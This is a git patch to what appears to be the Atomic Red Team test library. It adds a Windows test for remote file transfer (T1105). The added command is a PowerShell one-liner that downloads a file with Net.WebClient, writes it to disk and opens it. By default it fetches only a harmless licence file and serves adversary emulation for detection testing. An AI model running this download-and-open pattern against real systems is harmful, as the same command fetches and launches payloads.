From e8899b4df6d24fb2f8fcc9a93e1e5fb3bdfd384c Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Mon, 26 Jul 2021 13:00:42 -0700
Subject: [PATCH] Additional PowerShell Download in T1105

---
 atomics/T1105/T1105.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index c90158a6..7838f6a5 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -381,3 +381,23 @@ atomic_tests:
       timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
     cleanup_command: |
       rm -f #{output_file}
+
+- name: File Download via PowerShell
+  auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+  description: |
+    Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    target_remote_file:
+      description: File to download
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+    output_file:
+      description: File to write to
+      type: string
+      default: LICENSE.txt
+  executor:
+    command: |
+      (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+    name: powershell